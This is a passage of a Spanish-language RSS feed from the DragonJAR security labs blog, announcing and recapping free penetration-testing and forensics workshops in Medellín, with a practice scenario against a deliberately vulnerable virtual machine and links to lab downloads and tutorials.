<p>Nuevamente muchas gracias a tod@s l@s asistentes <img src='http://labs.dragonjar.org/wp-includes/images/smilies/icon_wink.gif' alt=';)' class='wp-smiley' /> </p>
]]></content:encoded>
			<wfw:commentRss>http://labs.dragonjar.org/registro-fotografico-del-hack-lab-07-en-medellin/feed</wfw:commentRss>
		<slash:comments>5</slash:comments>
		</item>
		<item>
		<title>Desarrollo del Laboratorio Virtual &#8211; Test de Penetración 1</title>
		<link>http://labs.dragonjar.org/desarrollo-del-laboratorio-virtual-test-de-penetracion-1</link>
		<comments>http://labs.dragonjar.org/desarrollo-del-laboratorio-virtual-test-de-penetracion-1#comments</comments>
		<pubDate>Wed, 14 Jan 2009 08:40:43 +0000</pubDate>
		<dc:creator>4v4t4r</dc:creator>
				<category><![CDATA[DragoNLab-HackTaller]]></category>
		<category><![CDATA[Análisis de Malware]]></category>
		<category><![CDATA[Entorno Virtualizado de Intrusión]]></category>
		<category><![CDATA[Hack Lab]]></category>
		<category><![CDATA[Malware]]></category>
		<category><![CDATA[Máquinas Virtuales]]></category>
		<category><![CDATA[Pentest]]></category>
		<category><![CDATA[Test de Penetración]]></category>

		<guid isPermaLink="false">http://labs.dragonjar.org/?p=494</guid>
		<description><![CDATA[<img src="http://img213.imageshack.us/img213/9760/icolabscu3.jpg"  />]]></description>
			<content:encoded><![CDATA[<p>El siguiente video tutorial hace la introducción y resumen de los laboratorios realizados en modo presencial y virtual referentes a Test de Penetración, Hacking: Técnicas y Contramedidas, Web Application PenTest e Informática Forense.</p>
<p align="center"><img alt="" src="http://img299.imageshack.us/img299/2074/pentestlu0.jpg" title="PenTest" class="aligncenter" width="450" height="332" /></p>
<p>La presentación no busca recrear por completo los temas tratados en cada uno de estos laboratorios, en lugar de ello presenta los apartes más importantes de los mismos, tratando de profundizar mucho más en los aspectos prácticos y técnicos.</p>
<p><span id="more-494"></span></p>
<p>Se hace necesario aclarar que en este video tutorial se presentan algunos conceptos a manera muy general, sin llegar al detalle como se ha hecho en cada una de las sesiones presenciales y virtuales, pues este solo busca nivelar y resumir sobre las sesiones realizadas a las personas que por diferentes razones no han podido estar presentes en estos, además de invitar a la comunidad e interesados a participar en los próximos.</p>
<p>La siguiente es la agenda a cubrir en la sesión:</p>
<p>- ¿Quiénes somos?<br />
- Conceptos básicos sobre Seguridad Informática / Test de Penetración<br />
- Estado actual de los Laboratorios de Seguridad Informática<br />
- ¿Qué son los Laboratorios de Seguridad Informática Labs.DragonJAR.org?<br />
- Laboratorios realizados<br />
- Objetivo del Laboratorio<br />
- Contenido del Laboratorio<br />
- Materiales necesarios para desarrollar el Laboratorio<br />
- Desarrollo del Laboratorio<br />
- Conclusiones</p>
<p>Este video tutorial llega hasta la presentación y resumen de los laboratorios realizados hasta la fecha, definición de aspectos básicos la seguridad de la información/Test de Penetración e introducción en el ambiente virtualizado a desarrollar.</p>
<p>En los próximos veremos como podemos llevar a cabo el proceso de configuración y desarrollo del Test de Penetración.</p>
<p><embed src="http://blip.tv/play/Ae3dKZSMLg" type="application/x-shockwave-flash" width="530" height="400" allowscriptaccess="always" allowfullscreen="true"></embed> </p>
<p><a href="http://www.4shared.com/file/80554284/59608a2b/PenTest1_LabsDragonJARorg.html">Descargar video tutorial de presentación e introducción en el Laboratorio de Test de Penetración</a></strong> (<strong>Password:</strong> www.dragonjar.org)</p>
]]></content:encoded>
			<wfw:commentRss>http://labs.dragonjar.org/desarrollo-del-laboratorio-virtual-test-de-penetracion-1/feed</wfw:commentRss>
		<slash:comments>12</slash:comments>
		</item>
		<item>
		<title>Laboratorio Virtual: Test de Penetración 1 (Introducción y Desarrollo)</title>
		<link>http://labs.dragonjar.org/laboratorio-virtual-test-de-penetracion-1-introduccion-y-desarrollo</link>
		<comments>http://labs.dragonjar.org/laboratorio-virtual-test-de-penetracion-1-introduccion-y-desarrollo#comments</comments>
		<pubDate>Thu, 18 Dec 2008 20:38:43 +0000</pubDate>
		<dc:creator>4v4t4r</dc:creator>
				<category><![CDATA[DragoNLab-HackTaller]]></category>
		<category><![CDATA[Análisis de Malware]]></category>
		<category><![CDATA[BackTrack]]></category>
		<category><![CDATA[Entorno Virtualizado de Intrusión]]></category>
		<category><![CDATA[Hack Lab]]></category>
		<category><![CDATA[Malware]]></category>
		<category><![CDATA[Máquinas Virtuales]]></category>
		<category><![CDATA[Test de Penetración]]></category>

		<guid isPermaLink="false">http://labs.dragonjar.org/?p=488</guid>
		<description><![CDATA[<img src="http://img213.imageshack.us/img213/9760/icolabscu3.jpg"  />]]></description>
			<content:encoded><![CDATA[<p style="text-align: justify;">&#8220;Hace días venía madurando la posibilidad de ofrecer los mismos laboratorios que vengo desarrollando en la ciudad de Medellín pero en modo virtual:<br />
<a href="http://anonym-url.com/go.php?to=http://labs.dragonjar.org/desarrollo-del-laboratorio-de-informatica-forense-en-medellin" target="_blank"><strong>Desarrollo del Laboratorio de Informática Forense en Medellín</strong></a><br />
<a href="http://anonym-url.com/go.php?to=http://labs.dragonjar.org/desarrollo-del-hacktaller-05-medellin-fotografias" target="_blank"><strong>Desarrollo del HackTaller 05 Medellín &#8211; Fotografías</strong></a><br />
<a href="http://anonym-url.com/go.php?to=http://labs.dragonjar.org/desarrollo-del-hacktaller-06-en-medellin-fotografias-y-escenario-propuesto" target="_blank"><strong>Desarrollo del HackTaller 06 en Medellín &#8211; Fotografías y Escenario propuesto</strong></a>&#8221;</p>
<p style="text-align: justify;">Este será llevado a cabo el próximo sabado 20 de diciembre &#8211; 2:00 PM To 4:00 PM (GMT-05:00) Eastern Time (US &amp; Canada)</p>
<p>Los interesados deben enviarme un correo electrónico, al cual yo responderé con el enlace al salón virtual.</p>
<p>4v4t4r @ gmail . com</p>
<p style="text-align: justify;"><span id="more-488"></span>La temática para este primer laboratorio virtual es la siguiente:</p>
<p><strong>Test de Penetración 1 (Introducción y Desarrollo)</strong></p>
<p>La finalidad de este primer Laboratorio virtual de Test de Penetración, será el ofrecer las técnicas, procesos y procedimientos necesarios para llevar a cabo un Test de Penetración haciendo uso de la Multi-Herramienta BackTrack.</p>
<p>Esto conllevará entonces a aprender y prácticar con ejemplos claros, sobre el uso de esta máginifica distribución. Además de las metodologías necesarias en un Test de Penetración.</p>
<p><strong>Escenario propuesto:</strong></p>
<p>El escenario para este Laboratorio es el de un CEO de una pequeña empresa que ha sido presionado por el Comité Administrativo para ser objeto de un Test de Penetración a realizarse desde la empresa. El Director General afirma que su empresa es segura, cree además de que este Test de Penetración será un enorme desperdicio de dinero, sobre todo porque ya tiene una solución de exploración (escaneo) de vulnerabilidades (Nessus). Para hacer “felices” a los del Comité Administrativo, él decide contratarlo a usted y le dá un plazo de 5 días para realizar el trabajo, pues como se mencionó él no cree que la empresa sea vulnerable a cualquier intento de acceso no autorizado.<br />
Su tarea es analizar solo un servidor en el cual se aloja una página Web que ofrece información de contacto de la misma.</p>
<p>El Director General espera que usted intente con todos los tipos de ataques que estén a su disposición, pues está seguro de que usted no podrá vulnerar el sistema y obtener acceso.<br />
Demostrar que el sistema es vulnerable sería la mejor manera de concientizar al Director General, para desde allí implementar mejores prácticas en materia de seguridad Informática.<br />
&#8212;&#8212;&#8212;-</p>
<p>De esta manera hago la invitación a todos los interesados en participar. No existe entonces la limitación geográfica que muchos usuarios presentan <img src="http://comunidad.dragonjar.org/Smileys/default/smiley.gif" border="0" alt="Sonrisa" />.</p>
<p style="text-align: justify;">Por ahora y como vieron en la descripción se hace necesario tener la distribución BackTrack.</p>
<p>La idea entonces es que descarguen la imágen y la configuren en una máquina virtual (VMWare Player / WorkStation / Server).<br />
Como sugerencia personal preferiría que descargaran la siguiente máquina virtual ya creada, con las vmware tools instaladas y lista para ser usada.</p>
<p><a href="http://anonym-url.com/go.php?to=http://174.36.1.2/bt3.7z" target="_blank"><strong>Descargar Máquina Virtual BackTrack 3</strong></a> (Desarrollada por <a href="http://anonym-url.com/go.php?to=http://bagside.com/bagvapp/index.html" target="_blank"><strong>Bagside</strong></a>)</p>
<p style="text-align: justify;">Ahora publico el sistema que será objeto del Test de Penetración.</p>
<p><a href="http://anonym-url.com/go.php?to=http://www.sendspace.com/file/hglz1o" target="_blank"><strong>Descargar imágen de Entorno Virtualizado de Intrusion +/- 195Mb</strong></a></p>
<p>La idea es que vayan leyendo los enlaces que publiqué anteriormente, además pueden ir descomprimiendo la máquina virtual BackTrack (+/- 1.5Gb).<br />
Recuerden además que este laboratorio será desarrollado en cualquiera de los productos VMWare (WorkStation, Player, Server), aunque de todas maneras mostraré como puede configurarse en Qemu. Así que por lo tanto deben tener instalado cualquiera de esos productos (preferiblemente VMWare WorkStation).</p>
<p>El laboratorio promete, así que espero no se lo pierdan, mucho menos las personas de otras ciudades y paises que han querido participar en los Hack Labs que realizo en mi ciudad.</p>
<p>Para ese día deben tener un buen sistema de sonido (ej. diadema o audífonos, para poder recepcionar bien el audio).<br />
Espero además que tengan una buena conexión a internet, pues algunos recursos así lo requieren.</p>
<p>Aún sigo esperando los correos electrónicos de las personas que estén interesadas, hasta el momento solo he recibido 8 correos, y solo puede ser transmitida la invitación por ese medio.<br />
De la buena asistencia depende de que continúe o no con la realización y publicación de los mismos <img src="http://comunidad.dragonjar.org/Smileys/default/wink.gif" border="0" alt="Gi&amp;ntilde;ar" /></p>
<p><strong>Textos e información de interés:</strong></p>
<p><a href="../descubrimiento-de-aplicaciones-nmap" target="_blank">http://labs.dragonjar.org/descubrimiento-de-aplicaciones-nmap</a><br />
<a href="../video-tutorial-de-instalacion-de-backtrack-3" target="_blank">http://labs.dragonjar.org/video-tutorial-de-instalacion-de-backtrack-3</a><br />
<a href="../test-de-penetracion-con-backtrack-netcat" target="_blank">http://labs.dragonjar.org/test-de-penetracion-con-backtrack-netcat</a><br />
<a href="../test-de-penetracion-con-backtrack-servicios-basicos" target="_blank">http://labs.dragonjar.org/test-de-penetracion-con-backtrack-servicios-basicos</a><br />
<a href="../test-de-penetracion-con-backtrack-conceptos-basicos" target="_blank">http://labs.dragonjar.org/test-de-penetracion-con-backtrack-conceptos-basicos</a><br />
<a href="../laboratorios-hacking-tecnicas-y-contramedidas-identificacion-de-banner%e2%80%99s-banderas-i" target="_blank">http://labs.dragonjar.org/laboratorios-hacking-tecnicas-y-contramedidas-identificacion-de-banner%e2%80%99s-banderas-i</a><br />
<a href="../laboratorios-hacking-tecnicas-y-contramedidas-identificacion-de-banner%e2%80%99s-banderas-ii" target="_blank">http://labs.dragonjar.org/laboratorios-hacking-tecnicas-y-contramedidas-identificacion-de-banner%e2%80%99s-banderas-ii</a><br />
<a href="../laboratorios-hacking-tecnicas-y-contramedidas-enumeracion-del-objetivo-ii" target="_blank">http://labs.dragonjar.org/laboratorios-hacking-tecnicas-y-contramedidas-enumeracion-del-objetivo-ii</a><br />
<a href="../laboratorios-hacking-tecnicas-y-contramedidas-scanning-i" target="_blank">http://labs.dragonjar.org/laboratorios-hacking-tecnicas-y-contramedidas-scanning-i</a><br />
<a href="../laboratorios-hacking-tecnicas-y-contramedidas-scanning-ii" target="_blank">http://labs.dragonjar.org/laboratorios-hacking-tecnicas-y-contramedidas-scanning-ii</a><br />
<a href="../laboratorios-hacking-tecnicas-y-contramedidas-scanning-iii" target="_blank">http://labs.dragonjar.org/laboratorios-hacking-tecnicas-y-contramedidas-scanning-iii</a><br />
<a href="../laboratorios-hacking-tecnicas-y-contramedidas-ataques-por-fuerza-bruta-brute-force-i" target="_blank">http://labs.dragonjar.org/laboratorios-hacking-tecnicas-y-contramedidas-ataques-por-fuerza-bruta-brute-force-i</a><br />
<a href="../laboratorios-hacking-tecnicas-y-contramedidas-ataques-por-fuerza-bruta-brute-force-iii" target="_blank">http://labs.dragonjar.org/laboratorios-hacking-tecnicas-y-contramedidas-ataques-por-fuerza-bruta-brute-force-iii</a><br />
<a href="../laboratorios-hacking-tecnicas-y-contramedidas-ataques-por-fuerza-bruta-brute-force-v" target="_blank">http://labs.dragonjar.org/laboratorios-hacking-tecnicas-y-contramedidas-ataques-por-fuerza-bruta-brute-force-v</a><br />
<a href="../laboratorios-hacking-tecnicas-y-contramedidas-ataques-por-fuerza-bruta-brute-force-vi" target="_blank">http://labs.dragonjar.org/laboratorios-hacking-tecnicas-y-contramedidas-ataques-por-fuerza-bruta-brute-force-vi</a></p>
]]></content:encoded>
			<wfw:commentRss>http://labs.dragonjar.org/laboratorio-virtual-test-de-penetracion-1-introduccion-y-desarrollo/feed</wfw:commentRss>
		<slash:comments>28</slash:comments>
		</item>
		<item>
		<title>Desarrollo del HackTaller 06 en Medellín &#8211; Fotografías y Escenario propuesto</title>
		<link>http://labs.dragonjar.org/desarrollo-del-hacktaller-06-en-medellin-fotografias-y-escenario-propuesto</link>
		<comments>http://labs.dragonjar.org/desarrollo-del-hacktaller-06-en-medellin-fotografias-y-escenario-propuesto#comments</comments>
		<pubDate>Sun, 30 Nov 2008 04:03:24 +0000</pubDate>
		<dc:creator>4v4t4r</dc:creator>
				<category><![CDATA[DragoNLab-HackTaller]]></category>
		<category><![CDATA[Análisis de Malware]]></category>
		<category><![CDATA[Laboratorio de seguridad informática]]></category>
		<category><![CDATA[Malware]]></category>
		<category><![CDATA[Test de Penetración]]></category>

		<guid isPermaLink="false">http://labs.dragonjar.org/?p=409</guid>
		<description><![CDATA[<img src="http://img213.imageshack.us/img213/9760/icolabscu3.jpg"  />]]></description>
			<content:encoded><![CDATA[<p style="text-align: justify;">Muchas gracias nuevamente a todas las personas que asistieron a este Hack Taller 06 en la ciudad de Medellín.</p>
<p style="text-align: center;"><img class="aligncenter" title="Hack Taller 06" src="http://img78.imageshack.us/img78/8270/hacktaller06xb2.jpg" alt="" width="450" height="296" /></p>
<p style="text-align: center;">
<p style="text-align: justify;">Creo que se ha cumplido este primer objetivo de comenzar a crear los grupos de estudio para estos laboratarios, se han nivelado conceptos relacionados con la <a href="http://es.wikipedia.org/wiki/Seguridad_de_la_informaci%C3%B3n" target="_blank"><strong>seguridad de la información</strong></a>, y se ha hecho un primer contacto a las personas con un <a href="http://elladodelmal.blogspot.com/2007/02/test-de-intrusion-i-de-vi.html" target="_blank"><strong>Test de Penetración</strong></a>.</p>
<p style="text-align: justify;">Este Hack Taller 06 fué una repetición del anterior, pues como mencioné, todas las personas que estaban interesadas en asistir no pudieron hacerlo por falta de cupos, el objetivo entonces de esta repetición era ofrecer una &#8220;oportunidad&#8221; de poder estar allí, para compartir y recibir conocimientos <img src='http://labs.dragonjar.org/wp-includes/images/smilies/icon_biggrin.gif' alt=':D' class='wp-smiley' /> .</p>
<p style="text-align: justify;"><span id="more-409"></span>Muchas gracias a todos y cada uno de los asistentes, como siempre especialmente a Sebas, Jhony y Jhonatan, que siempre están pendientes de los espacios.</p>
<p style="text-align: justify;">Para este Hack Taller he propuesto una metodología que consiste en una primera sección donde hago una exposición de <a href="http://labs.dragonjar.org/category/hacking" target="_blank"><strong>conceptos, técnicas y tácticas</strong></a> sobre seguridad informática y <a href="http://labs.dragonjar.org/test-de-penetracion-con-backtrack-conceptos-basicos" target="_blank"><strong>Test de Penetración</strong></a> que serán últiles y de interés para la segunda parte donde se lleva a cabo un <a href="http://labs.dragonjar.org/test-de-penetracion-con-backtrack-conceptos-basicos" target="_blank"><strong>Test de Penetración</strong></a> a un ambiente virtualizado de intrusión.</p>
<p style="text-align: justify;">Dejo entonces el registro fotográfico y el escenario propuesto como primera entrega sobre el desarrollo del Hack Taller.</p>
<p style="text-align: justify;"><strong>Escenario Propuesto</strong></p>
<p style="text-align: justify;">El escenario para este Laboratorio es el de un <a href="http://es.wikipedia.org/wiki/Director_ejecutivo" target="_blank"><strong>CEO</strong></a> de una pequeña empresa que ha sido presionado por el Comité Administrativo para ser objeto de un <a href="http://labs.dragonjar.org/test-de-penetracion-con-backtrack-conceptos-basicos" target="_blank"><strong>Test de Penetración</strong></a> a realizarse desde la empresa. El Director General afirma que su empresa es segura, cree además de que este Test de Penetración será un enorme desperdicio de dinero, sobre todo porque ya tiene una solución de exploración (escaneo) de vulnerabilidades (<a href="http://labs.dragonjar.org/laboratorios-hacking-tecnicas-y-contramedidas-escaneo-de-vulnerabilidades-iii" target="_blank"><strong>Nessus</strong></a>). Para hacer “felices” a los del Comité Administrativo, él decide contratarlo a usted y le da un plazo de 5 días para realizar el trabajo, pues como se mencionó él no cree que la empresa sea vulnerable a cualquier intento de acceso no autorizado.<br />
Su tarea es analizar solo un servidor en el cual se aloja una página Web que ofrece información de contacto de la misma.</p>
<p>El Director General espera que usted intente con todos los tipos de ataques que estén a su disposición, pues está seguro de que usted no podrá vulnerar el sistema y obtener acceso.<br />
<strong>Demostrar que el sistema es vulnerable sería la mejor manera de concientizar al Director General, para desde allí implementar mejores prácticas en materia de seguridad Informática.</strong></p>
<p style="text-align: justify;"><a href="http://www.flickr.com/photos/31597104@N06/3069999198/in/set-72157610456974372/" target="_blank"><strong>Galería Fotográfica del 6° HackTaller realizado en Medellín</strong></a><br />
<a href="http://www.flickr.com/photos/31597104@N06/sets/72157610456974372/show/with/3069999198/" target="_blank"><strong>Galería en modo presentación</strong></a></p>
]]></content:encoded>
			<wfw:commentRss>http://labs.dragonjar.org/desarrollo-del-hacktaller-06-en-medellin-fotografias-y-escenario-propuesto/feed</wfw:commentRss>
		<slash:comments>7</slash:comments>
		</item>
		<item>
		<title>HackTaller 06 Medellín &#8211; Curso de Seguridad Informática -Repetición</title>
		<link>http://labs.dragonjar.org/hacktaller-06-medellin-curso-de-seguridad-informatica-repeticion</link>
		<comments>http://labs.dragonjar.org/hacktaller-06-medellin-curso-de-seguridad-informatica-repeticion#comments</comments>
		<pubDate>Tue, 25 Nov 2008 14:53:13 +0000</pubDate>
		<dc:creator>4v4t4r</dc:creator>
				<category><![CDATA[DragoNLab-HackTaller]]></category>
		<category><![CDATA[Análisis de Malware]]></category>
		<category><![CDATA[Curso de seguridad]]></category>
		<category><![CDATA[Malware]]></category>
		<category><![CDATA[Seguridad Informática]]></category>

		<guid isPermaLink="false">http://labs.dragonjar.org/?p=400</guid>
		<description><![CDATA[<img src="http://img213.imageshack.us/img213/9760/icolabscu3.jpg"  />]]></description>
			<content:encoded><![CDATA[<p style="text-align: justify;">Hago anuncio oficial del 6° HackTaller de la Comunidad DragonJAR en Medellín.<br />
Este HackTaller será una repetición del pasado HackTaller, ya que por cuestiones de espacio no se pudo tener a todos los interesados en asistir (llegué a tener más 40 solicitudes, ya se puede ir pensando en un evento nacional de la Comunidad DragonJAR ).</p>
<p>La idea entonces es hacer todo un ciclo completo de capacitación en común, donde le demos continuidad al mismo.</p>
<p><strong>HackTaller 06 Medellín &#8211; Curso de Seguridad Informática</strong><br />
<strong>Lugar:</strong> Tecnosoft &#8211; Parque Tecnológico, Boston (antiguo Colegio San José, ahora ITM de Boston) Cr 31 # 54 – 10<br />
<strong>Fecha:</strong> Sabado 29 de Noviembre<br />
<strong>Hora:</strong> 2:00 pm<br />
<strong>Asistentes:</strong> Cualquier persona interesada en aprender y compartir conocimiento<br />
Requisitos: Cuaderno de apuntes / Dispositivo de almacenamiento (Preferiblemente igual o superior a 2 gigas)<br />
<strong>Únicamente pueden asistir las personas que realicen el respectivo registro por medio electrónico (E-mail a <a href="mailto:4v4t4r@gmail.com">4v4t4r@gmail.com</a> con el nombre, el registro se lleva a cabo luego de que yo le confirme el puesto por medio de respuesta al e-mail recibido)</strong><br />
<strong>Notas aclaratorias:</strong> Estos HackTalleres <strong>NO TIENEN NINGÚN COSTO</strong><br />
Buena disposición de aprendizaje.<br />
<strong><br />
Cupos limitados, +/- 15 personas.</strong></p>
<p><strong>Repito:</strong> <span style="font-size: 13pt; line-height: 1.3em;"><strong>Solo</strong></span> pueden asistir las personas que confirmen asistencia (el proceso de confirmación consiste en que me envía la solicitud y yo le confirmo por e-mail la reserva de su cupo), Lo hago de esta manera para garantizar de que todos estén comodos y no tengan que ocupar un equipo por dos personas, o peor aún que vaya y no tenga reserva de cupo.<br />
Aclaro también y pongo a disposición sobre quienes tengan laptops personales y quieran llevarlo allá le hago el espacio y aprende con todos.</p>
]]></content:encoded>
			<wfw:commentRss>http://labs.dragonjar.org/hacktaller-06-medellin-curso-de-seguridad-informatica-repeticion/feed</wfw:commentRss>
		<slash:comments>1</slash:comments>
		</item>
		<item>
		<title>Desarrollo del HackTaller 05 Medellín &#8211; Fotografías</title>
		<link>http://labs.dragonjar.org/desarrollo-del-hacktaller-05-medellin-fotografias</link>
		<comments>http://labs.dragonjar.org/desarrollo-del-hacktaller-05-medellin-fotografias#comments</comments>
		<pubDate>Sun, 16 Nov 2008 14:52:01 +0000</pubDate>
		<dc:creator>4v4t4r</dc:creator>
				<category><![CDATA[DragoNLab-HackTaller]]></category>
		<category><![CDATA[Análisis de Malware]]></category>
		<category><![CDATA[Malware]]></category>
		<category><![CDATA[Máquinas Virtuales]]></category>
		<category><![CDATA[Test de Penetración]]></category>

		<guid isPermaLink="false">http://labs.dragonjar.org/?p=335</guid>
		<description><![CDATA[<img src="http://img213.imageshack.us/img213/9760/icolabscu3.jpg"  />]]></description>
			<content:encoded><![CDATA[<p style="text-align: justify;">Nuevamente muchas gracias a todos y todas las asistentes a este 5° HackTaller realizado en la ciudad de Medellín.</p>
<p style="text-align: center;"><img class="aligncenter" title="all" src="http://img356.imageshack.us/img356/6280/allar9.jpg" alt="" width="450" height="338" /></p>
<p style="text-align: justify;">En el transcurso de la semana iré publicando el ambiente virtualizado de intrusión que utilicé para esta sesión, así mismo publicaré los videos de como realizarlo (solo uno de los métodos para realizarlo, pues existen algunos más).</p>
<p style="text-align: justify;">La asistencia fue masiva, pues al completarse el registro para una persona por computador, muchos atendieron a la opción que dí, la cual consistía en que llevaran sus equipos portátiles personales.</p>
<p style="text-align: justify;"><span id="more-335"></span>Este HackTaller sirvió para entrar en contacto de una manera más práctica con la temática de la seguridad informática, más especificamente con los Test de Intrusión, concientizó a todos los asistentes sobre lo mucho que aún nos falta por aprender y que este espacio y este tipo de eventos nos permitirán mejorar , investigar y desarrollar capacidades cognoscitivas.</p>
<p style="text-align: justify;">El próximo sabado repetiré este mismo HackTaller con las personas que esten interesadas en asistir y que no alcanzaron cupo. El martes confirmo la realización del mismo.</p>
<p style="text-align: justify;">No queda nada más que agradecer a todos los asitentes, como siempre a Jhony y Sebas quienes siempre están pendientes y dispuestos a facilitarme el espacio, a los nuevos amigos del Sena, quienes se hicieron presentes y compartieron de este HackTaller (y que le dirán a fernando que les enseñe todo lo que el sabe), a los compañeros de SoftNet (quienes por amor al arte les toco sentados en el piso con sus laptops) que amablemente ofrecieron algunos dispositivos que poseen en sus trabajos.</p>
<p style="text-align: justify;">A todos los que no pudieron asistir se les extrañó, y espero que puedan hacerlo para el próximo HackTaller <img src='http://labs.dragonjar.org/wp-includes/images/smilies/icon_wink.gif' alt=';)' class='wp-smiley' /> </p>
<p style="text-align: justify;">Dejo a continuación el enlace de acceso al registro fotográfico del HackTaller, (<span style="text-decoration: line-through;">no quedé en ninguna foto&#8230; ando de fotografo últimamente XD creo que moriré de hambre&#8230;</span>)</p>
<h2 style="text-align: justify;"><a href="http://www.flickr.com/photos/31597104@N06/sets/72157609204085715/" target="_blank"><strong>Galería Fotográfica del 5° HackTaller realizado en Medellín</strong></a></h2>
<h2 style="text-align: justify;"><a href="http://www.flickr.com/photos/31597104@N06/sets/72157609204085715/show/" target="_blank">Galería en modo presentación</a></h2>
]]></content:encoded>
			<wfw:commentRss>http://labs.dragonjar.org/desarrollo-del-hacktaller-05-medellin-fotografias/feed</wfw:commentRss>
		<slash:comments>6</slash:comments>
		</item>
		<item>
		<title>HackTaller 05 Medellín &#8211; Curso de Seguridad Informática</title>
		<link>http://labs.dragonjar.org/hacktaller-05-medellin-curso-de-seguridad-informatica</link>
		<comments>http://labs.dragonjar.org/hacktaller-05-medellin-curso-de-seguridad-informatica#comments</comments>
		<pubDate>Mon, 10 Nov 2008 17:43:20 +0000</pubDate>
		<dc:creator>4v4t4r</dc:creator>
				<category><![CDATA[DragoNLab-HackTaller]]></category>
		<category><![CDATA[Análisis de Malware]]></category>
		<category><![CDATA[Curso de seguridad]]></category>
		<category><![CDATA[Malware]]></category>
		<category><![CDATA[Seguridad Informática]]></category>

		<guid isPermaLink="false">http://labs.dragonjar.org/?p=327</guid>
		<description><![CDATA[<img src="http://img213.imageshack.us/img213/9760/icolabscu3.jpg"  />]]></description>
			<content:encoded><![CDATA[<p style="text-align: justify;">Extiendo la invitación a toda la Comunidad en general para que asistan a este 5° HackTaller en la ciudad de Medellín.<br />
En el pasado HackTaller, puse en discusión y votación la elección de temas para el próximo HackTaller, en donde les ofrecí la posibilidad de escoger entre varias temáticas, entre ellas Informática Forense a sistemas Linux, Test de Penetración, Criptografía entre otros.</p>
<p style="text-align: justify;"><span id="more-327"></span>Como resultado se decidió  realizar una HackTaller en modo de curso en seguridad informática, en el cual se tratarán los diferentes temas relacionados con la seguridad de la información pero desde el principio, o como decimos algunos &#8220;Desde 0&#8243;.</p>
<p>Aún me encuentro desarrollando todo el contenido temático, pero a modo de &#8220;adelanto&#8221; les cuento que aprenderemos sobre los siguientes temas entre otros:</p>
<p><strong>-</strong> Conceptos básicos en Seguridad Informática<br />
<strong>-</strong> Seguridad en las Redes<br />
<strong>-</strong> Seguridad en el Software<br />
<strong>-</strong> Seguridad en los aplicativos Web<br />
<strong>-</strong> Test de Penetración<br />
<strong>-</strong> Normatividad y Estándares<br />
<strong>-</strong> Informática Forense<br />
<strong>-</strong> Técnicas antiforenses<br />
<strong>-</strong> Criptografía<br />
<strong>-</strong> Vitualización<br />
<strong>-</strong> Linux<br />
<strong>-</strong> Programación en C (cliente/servidor)<br />
<strong>-</strong> Programación en lenguaje ensamblador</p>
<p>La idea entonces es hacer todo un ciclo completo de capacitación en común, donde le demos continuidad al mismo.<br />
Comenzaríamos este próximo sabado 15 de noviembre, y trataría de seguirlo cada 8 o en su defecto cada 15 días, según mi disponibilidad de tiempo.</p>
<p><strong>Resumiendo:</strong><br />
<strong>HackTaller 05 Medellín &#8211; Curso de Seguridad Informática</strong><br />
<strong>Lugar: </strong>Tecnosoft &#8211; Parque Tecnológico, Boston (antiguo Colegio San José, ahora ITM de Boston) Cr 31 # 54 – 10<br />
<strong>Hora:</strong> 2:00 pm<br />
<strong>Asistentes:</strong> Cualquier persona interesada en aprender y compartir conocimiento<br />
Requisitos: Cuaderno de apuntes / Dispositivo de almacenamiento (Preferiblemente igual o superior a 2 gigas)<br />
Únicamente pueden asistir las personas que realicen el respectivo registro por medio electrónico (E-mail a 4v4t4r (en) gmail.com con el nombre, el registro se lleva a cabo luego de que yo le confirme el puesto por medio de respuesta al e-mail recibido)<br />
<strong>Notas aclaratorias:</strong> Estos HackTalleres <strong>NO TIENEN NINGÚN COSTO</strong><br />
Pueden asistir todas las personas que confirmen su interés en participar.<br />
Buena disposición de aprendizaje.</p>
<p style="text-align: justify;">Cupos limitados, +/- 15 personas.</p>
<h2><a href="http://comunidad.dragonjar.org/index.php/topic,1328.msg6497.html#msg6497"><br />
<strong></strong></a><strong><a href="http://comunidad.dragonjar.org/index.php/topic,1328.msg6565.html#msg6565">http://comunidad.dragonjar.org/index.php/topic,1328.msg6565.html#msg6565</a></strong></h2>
]]></content:encoded>
			<wfw:commentRss>http://labs.dragonjar.org/hacktaller-05-medellin-curso-de-seguridad-informatica/feed</wfw:commentRss>
		<slash:comments>6</slash:comments>
		</item>
		<item>
		<title>Laboratorio: Informática Forense &#8211; Entorno de trabajo</title>
		<link>http://labs.dragonjar.org/laboratorio-informatica-forense-entorno-de-trabajo</link>
		<comments>http://labs.dragonjar.org/laboratorio-informatica-forense-entorno-de-trabajo#comments</comments>
		<pubDate>Mon, 27 Oct 2008 16:19:11 +0000</pubDate>
		<dc:creator>4v4t4r</dc:creator>
				<category><![CDATA[Informática Forense]]></category>
		<category><![CDATA[Análisis de Malware]]></category>
		<category><![CDATA[DragoNLab-HackTaller]]></category>
		<category><![CDATA[Imágen]]></category>
		<category><![CDATA[Malware]]></category>
		<category><![CDATA[Mount Image Pro]]></category>

		<guid isPermaLink="false">http://labs.dragonjar.org/?p=293</guid>
		<description><![CDATA[<img src="http://img81.imageshack.us/img81/3272/forenseminikc9.jpg"  />]]></description>
			<content:encoded><![CDATA[<p style="text-align: justify;">Una vez definido el sistema de archivos y la información relevante sobre la imágen a analizar, procederemos a implementar nuestro entorno de trabajo.</p>
<p style="text-align: justify;">Para ello utilizaremos la partición objetivo como una unidad más en nuestra máquina. Para esta labor haremos uso de la solución software Mount Image Pro.</p>
<p style="text-align: justify;"><a href="http://www.mountimage.com/" target="_blank"><strong>Mount Image Pro</strong></a> nos permitirá montar en Windows los archivos de imágenes, conservando la integridad de la imagen a analizar.</p>
<p style="text-align: justify;"><span id="more-293"></span>En el siguiente video tutorial se detallará el paso a paso del proceso de instalación de <a href="http://www.mountimage.com/" target="_blank"><strong>Mount Image Pro</strong></a> en nuestra máquina. Además mostraré el procedimiento de implementación de la imágen objetivo como una unidad más en nuestro PC.</p>
<p><img class="aligncenter" title="FTP" src="http://img204.imageshack.us/img204/9266/imageprolm8.jpg" alt="NTFS" width="550" height="368" /></p>
<p style="text-align: justify;"><a href="http://www.4shared.com/file/68603004/67fb4d7f/Mount_Image_Pro-LabsDragonJARorg.html" target="_blank"><strong>Descargar Videotutorial de instalación de Mount Image Pro  e implementación de la imágen</strong></a> (password: www.dragonjar.org)<br />
<a href="http://www.mountimage.com/" target="_blank"><strong>Más información sobre Mount Image Pro</strong></a><br />
<a href="http://download.getdata.com/MIP-Setup.exe" target="_blank"><strong>Descargar Mount Image Pro</strong></a> (Trial totalmente operativo por 30 días)</p>
]]></content:encoded>
